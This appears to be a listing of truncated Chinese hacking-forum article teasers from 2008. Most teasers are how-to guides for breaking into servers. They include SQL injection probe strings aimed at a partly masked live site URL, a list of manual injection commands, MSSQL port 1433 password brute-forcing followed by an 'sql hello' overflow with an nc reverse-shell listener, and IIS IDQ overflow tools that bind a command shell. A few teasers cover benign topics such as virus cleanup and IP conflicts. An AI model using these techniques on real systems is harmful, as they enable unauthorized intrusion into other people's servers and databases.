现在给大家说说怎么样通过注入点判断服务器的硬盘(分区)是否有访问权，http://www.fun***.com/user/wmadown.asp?id=48187，这个是注入点了的。现在我们用 SQL查询语句试试，C盘是否有访问权限。 语句是： and (select count(*) from c:autoexec.bat.c)0 解释一下原理...

2008-02-23 07:05:32

希望对新手入侵有帮助！ 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键） 最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口...

2008-02-23 07:05:33

问：前两天我打开了mail中的一个附件，因为那个mail的地址和我一个同事的地址很像，因此没有多考虑就将附件下载打开了。不想这个附件是个病毒，它让我的机器变的很慢，杀毒之后好像没有太大作用。请问我该怎么办？ 答：病毒、木马、和一些恶意软件，往往都会对Widnows...

2008-02-23 07:05:33

当您安装新的 Windows XP Home、Professional 计算机时，需要确保系统安装了最新的更新软件和安全软件，以便在连接至 Internet 之前防御病毒和其它潜在威胁。连接至 Internet 后，定期更新操作系统和防病毒软件也同样重要。 下面这些步骤可帮助您以最新可用的 Windows...

2008-02-23 07:05:30

很多用户都遇到过IP地址冲突的问题，往往大为光火，却又无能为力，这些问题该如何解决呢？本文将介绍了相应的知识，以及避免出现类似问题的方法。 网络简介 作为典型的企业网架构，本单位网络拓扑结构大致分为三级，并全部采用北电产品。第一级由ATM交换机组成，网络服...

2008-02-23 07:05:24

首先介绍下什么样的站点可以入侵：必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0） 入侵介绍： 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的...

2008-02-23 07:05:24

所用程序：idahack。 进入MS-DOS方式，这里假设idq.exe位于c:下， c:idahack.exe 运行参数：c:idahack chinese win2k : 1 chinese win2ksp1: 2 chinese win2ksp2: 3 english win2k : 4 english win2ksp1: 5 english win2ksp2: 6 japanese win2k : 7 japanese win2ks...

2008-02-23 07:05:22

整理了下手动注入脚本命令[带注释] 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects...

2008-02-23 07:05:23

要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。 首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP。端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813，不改了。用默认的，左面选择操...

2008-02-23 07:05:17

Blog被人渗透了一下，不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来，那次我掉了一个小东西，然后今天别人告诉我NBSI 3用了那个东西的方法。呵呵，有点晕，就是下面的，成功率还是很高的，大家可以试试看。嗯，方法流出去无所谓，文章留着吧。 dbowner...

2008-02-23 07:05:16